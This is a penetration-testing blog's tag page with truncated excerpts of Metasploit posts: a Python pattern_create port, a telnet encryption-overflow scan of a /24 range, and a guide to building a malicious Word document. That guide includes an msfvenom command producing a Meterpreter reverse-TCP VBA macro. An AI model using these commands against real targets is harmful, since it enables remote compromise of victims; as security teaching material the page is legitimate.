metasploit
So, when you don’t have metasploit or ruby in your environment and you need to run pattern_create.rb what do you do?
Well if you’ve got Python available you simply rewrite the code in python.
Here’s the code (it’s used in exactly the same way as the metasploit version of pattern create):
12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152#!/usr/bin/env python # Author: phillips321 # Site: www.phillips321.co.uk # Version 0.1 # Credits: metasploit project # About: Replicates msf… Continue reading →Mentioned by hdm here and here but I wanted to make a note of this myself. First thing to do is setup the scan to look for vulnerable telnetd services:
12345msf > use auxiliary/scanner/telnet/telnet_encrypt_overflow msf auxiliary(telnet_encrypt_overflow) > set RHOSTS 192.168.0.0/24 RHOSTS => 192.168.0.0/24 msf auxiliary(telnet_encrypt_overflow) > set THREADS 64 THREADS => 64And now to run the scan
123456789101112131415msf auxiliary(telnet_encrypt_overflow) > run [*] 192.168.0.1:23 Does not support encryption: Netgear Embedded… Continue reading →So it’s been spoken of alot but i’d never actually got around to trying it. A colleague has been banging on about it for weeks and before he got chance to play with it a second colleague managed to use this in the wild. Sweet! I decided it would be worth playing with in order to have a go at creating my own DLL and seeing what is vulnerable on… Continue reading →
So you want/need a malicious word document in order to own a target, step in metasploit.
The first thing you’ll need to do is create the code that you’ll copy&paste into your word document.
1./msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f vba > vbcode.txtThe output will contain 2 blocks of code; the macro and the data.
Open a new word document and Press Alt+F11 in order to open “Microsoft Visual… Continue reading →
So unfortunately I have not had the time lately to keep up to date with the changes going on with metasploit but one thing that caught my eye was the msfvenom binary in the root of the framework3 directory. Neat name, but what is it? A little googling found me this blog post by bannedit. He goes on to mention that msfvenon simply combines the functionality of both msfpayload… Continue reading →
Recent Posts
- Automating an Active Directory Audit in PowerShell
- CherryTree on MacOS (OSX)
- IPv6 LocalLink to IPv4 scanning tool
- NetKit IPv6 Test Lab
- WiPiResponder = Pi Zero W + Responder
- Recovering an activity from a Garmin 920 XT Forerunner
- hashcat on OS X – getting it going!
- PHP NMAP Scan Page
- Hacking the ATN X-sight – part1
- NFSShell on Kali Linux 2.0